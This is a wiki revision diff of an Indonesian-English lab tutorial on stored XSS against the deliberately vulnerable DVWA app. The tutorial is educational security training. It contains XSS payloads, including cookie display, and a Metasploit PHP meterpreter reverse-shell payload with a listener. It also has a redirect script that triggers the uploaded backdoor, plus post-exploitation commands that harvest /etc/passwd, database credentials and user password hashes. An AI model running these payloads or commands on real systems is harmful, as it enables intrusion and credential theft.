Difference between revisions of "DVWA: XSS"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
| Line 116: | Line 116: | ||
Message: | Message: | ||
| − | <script>window.location="http://192.168.1. | + | <script>window.location="http://192.168.0.100/DVWA-1.9/hackable/uploads/FORUM_BUG.php" </script> |
Replace 192.168.1.106 with the IP Address obtain from Fedora 14 in (Section 3, Step 3). | Replace 192.168.1.106 with the IP Address obtain from Fedora 14 in (Section 3, Step 3). | ||
| Line 141: | Line 141: | ||
grep "db_" /var/www/html/dvwa/config/config.inc.php | grep "db_" /var/www/html/dvwa/config/config.inc.php | ||
This produces the database name, username, and password information to log into the mysql database. | This produces the database name, username, and password information to log into the mysql database. | ||
| − | echo "use dvwa; show tables;" | mysql -uroot - | + | echo "use dvwa; show tables;" | mysql -uroot -p123456 |
This command produces a table list of the dvwa database. | This command produces a table list of the dvwa database. | ||
| − | echo "use dvwa; desc users;" | mysql -uroot - | + | echo "use dvwa; desc users;" | mysql -uroot -p123456 |
This command describes the columns of the users table in the dvwa datase. | This command describes the columns of the users table in the dvwa datase. | ||
| − | echo "select user,password from dvwa.users;" | mysql -uroot - | + | echo "select user,password from dvwa.users;" | mysql -uroot -p123456 |
This command displays the user and password information for each user in the dvwa.users table. | This command displays the user and password information for each user in the dvwa.users table. | ||
| Line 152: | Line 152: | ||
Place the html <pre> tag in the xss.html file. | Place the html <pre> tag in the xss.html file. | ||
The <pre> is used as a pre-formatter. | The <pre> is used as a pre-formatter. | ||
| − | echo "select user,password from dvwa.users;" | mysql -uroot - | + | echo "select user,password from dvwa.users;" | mysql -uroot -p123456 >> /var/www/html/dvwa/hackable/uploads/xss.html |
Place user and password for the dvwa.users table in the xss.html file. | Place user and password for the dvwa.users table in the xss.html file. | ||
echo "</pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html | echo "</pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html | ||
| Line 164: | Line 164: | ||
On BackTrack, place the below URI in Firefox | On BackTrack, place the below URI in Firefox | ||
| − | http://192.168.1. | + | http://192.168.0.100/DVWA-1.9/hackable/uploads/xss.html |
Replace the above IP address with the IP Address obtained in (Section 3, Step 3). | Replace the above IP address with the IP Address obtained in (Section 3, Step 3). | ||
Revision as of 09:35, 28 May 2017
sumber: http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson9/index.html
Tujuan
- Test a basic cross site scripting (XSS) attack
- Test an iframe cross site scripting (XSS) attack
- Test a cookie cross site scripting (XSS) attack
- Create a php/meterpreter/reverse_tcp payload
- Start the php/meterpreter/reverse_tcp listener
- Upload the PHP payload to the DVWA Upload screen
- Test a PHP Payload cross site scripting (XSS) attack
Di sisi DVWA
Cek IP
ifconfig
Fix Stored Cross Site Scripting (XSS) Comment Box
Edit index.php
cd /var/www/html/DVWA-1.9/vulnerabilities/xss_s/ vi index.php
Search dengan keyword mtxMessage Ubah maxlength=50
<textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"50\"></textarea>
menjadi maxlength=250
<textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"250\"></textarea>
Di sisi Kali Linux
Cek IP Kali Linux
ifconfig -a
Enable Javascript di Browser
Buka Firefox Preferences > Content > Uncheck - Block pop-up windows
Masuk ke DVWA
- Login
- DVWA Security > Low
XSS Stored Basic Exploit Test
- Klik > XSS (Stored)
- Pada Name isi "Test 1"
- Pada Message isi "<script>alert("This is a XSS Exploit Test")</script>"
- Klik > Sign Guestbook
XSS Stored IFRAME Exploit Test
- Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
- Klik > XSS (Stored)
- Pada Nama isi "Test 2"
- Pada Message isi "<iframe src="http://www.cnn.com"></iframe>"
- Klik > Sign Guestbook
Tampak bahwa CNN muncul di bawah "Test 2" .
This is a powerful exploit because a user could use SET to create Malicious cloned website and place in here.
e.g., Social Engineering Toolkit (SET): Lesson 3: Create Malicious Weblink, Install Virus, Capture Forensic Images
XSS Stored COOKIE Exploit Test
- Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
- Klik > XSS (Stored)
- Pada Nama isi "Test 3"
- Pada Message isi "<script>alert(document.cookie)</script>"
- Klik > Sign Guestbook
Below is the cookie/session that the webserver establishes with the current browser session. An attacker could easily modify this XSS script to send the cookie to a remote location instead of displaying it. Image if this was a bank website. Every time a user logs in their cookie information could be sent to a remote location.
Build PHP msfpayload
mkdir -p /root/backdoor cd /root/backdoor msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444 R > FORUM_BUG.php ls -l FORUM_BUG.php
Select "Upload" from the left navigation menu. Click Browse
Start msfconsole
msfconsole
use exploit/multi/handler set PAYLOAD php/meterpreter/reverse_tcp set LHOST 192.168.1.105 set LPORT 4444 exploit
XSS Stored window.location Exploit Test
- Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
- Klik > XSS (Stored)
Name: Test 4 Message:
<script>window.location="http://192.168.0.100/DVWA-1.9/hackable/uploads/FORUM_BUG.php" </script> Replace 192.168.1.106 with the IP Address obtain from Fedora 14 in (Section 3, Step 3).
Click Sign Guestbook Click OK when the Test 1 Message is displayed
shell
Establishes a "sh" shell.
tail /etc/passwd
This produces a potential prospect list for a ssh brute force attack
whoami
Displays the name of the user.
grep apache /etc/passwd
The goal of this command is obtaining the home directory for the apache username.
find /var/www/* -print | grep config
Here I am wanting to find all the configuration files in the /var/www directory.
grep "db_" /var/www/html/dvwa/config/config.inc.php
This produces the database name, username, and password information to log into the mysql database.
echo "use dvwa; show tables;" | mysql -uroot -p123456
This command produces a table list of the dvwa database.
echo "use dvwa; desc users;" | mysql -uroot -p123456
This command describes the columns of the users table in the dvwa datase.
echo "select user,password from dvwa.users;" | mysql -uroot -p123456
This command displays the user and password information for each user in the dvwa.users table.
echo "
" >> /var/www/html/dvwa/hackable/uploads/xss.html
Place the html <pre> tag in the xss.html file.
The <pre> is used as a pre-formatter.
echo "select user,password from dvwa.users;" | mysql -uroot -p123456 >> /var/www/html/dvwa/hackable/uploads/xss.html
Place user and password for the dvwa.users table in the xss.html file.
echo "" >> /var/www/html/dvwa/hackable/uploads/xss.html Place the close html tag in the xss.html file.
echo "
Your Name
" >> /var/www/html/dvwa/hackable/uploads/xss.html Replace the string "Your Name" with your actual name. date >> /var/www/html/dvwa/hackable/uploads/xss.html
On BackTrack, place the below URI in Firefox
http://192.168.0.100/DVWA-1.9/hackable/uploads/xss.html
Replace the above IP address with the IP Address obtained in (Section 3, Step 3).